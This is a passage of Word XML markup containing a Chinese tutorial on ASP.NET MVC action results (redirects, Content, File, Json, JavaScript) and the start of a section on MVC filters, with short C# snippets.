          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> { controller = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Admin"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">, action = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"Index"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RedirectToActionPermanent</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>RedirectToAction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>不同的是它采用的是301重定向，这种重定向对SEO更友好，因为它可以保留原网页的Ranking记录。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:t>返回指定文本内容，可以指定文本类型和编码格式</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>显示/下载 一个文件</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回JSON格式数据</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="22"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一段JavaScript字符串到前台，但不执行，前台可以调用eval来执行这段代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>理解动作结果</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在讲述动作结果之前我们先看看ASP.NET WebForms是如何处理响应的：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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context.Response.Clear();</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context.Response.ContentType = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"text/json"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w: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context.Response.Write(JsonConvert.SerializeObject(dict));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>context.Response.End();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>或</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context.Response.Redirect(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="A31515"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>"../Home/Index.html"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="19"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="宋体" w:cs="新宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>context.Response.End();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上述代码返回了一个JSON对象到前台，跳转到首页，这种办法是可行的，但它存在几个问题：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后台要必须包含详细的URL或HTML代码，这让代码难以维护。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将响应直接生成输出，会让测试难以进行，为了确保输出是什么，需要创建Response对象的模仿实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>…</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>幸好MVC的动作结果(Action Result)很好地解决了这个问题。它将“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>指明意图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”和“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>执行意图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>”分开。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>首先MVC不会直接操作Response对象，而是返回一个实现了ActionResult类的对象，它描述控制器响应要完成的功能。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>例如：重定向，渲染一个视图，返回JSON。。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="0070C0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>当MVC框架从动作结果接收到一个ActionResult对象时，它调用由这个对象所定义的ExecuteResult方法。然后在该动作结果的实现中处理Response对象，生成复合你意图的输出。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>这是JsonResult的部分底层代码，可以看到最终调用的是Response.write()返回JSON字符串：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">JavaScriptSerializer javaScriptSerializer = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008B8B"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="191970"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>JavaScriptSerializer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.MaxJsonLength.HasValue)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">          javaScriptSerializer.MaxJsonLength = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.MaxJsonLength.Value;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.RecursionLimit.HasValue)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">           javaScriptSerializer.RecursionLimit = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.RecursionLimit.Value;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> }</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>response.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Write</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(javaScriptSerializer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="191970"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Serialize</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>this</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.Data));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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Filter过滤器</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>过滤器</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以把附加逻辑注入到MVC框架的请求处理。它们实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>交叉关注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。所谓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>交叉关注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是指，可以用于整个应用程序，而又不适合放置在某个局部的位置的功能，否则会打破关注分离模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="37"/>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>MVC有五种类型的过滤器，每种类型能让你在请求处理的不同点上引入逻辑。</w:t>
      </w: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410"/>
        <w:gridCol w:w="2551"/>
        <w:gridCol w:w="4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pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>过滤器类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2410" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
              </w:rPr>
              <w:t>接口</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="37"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
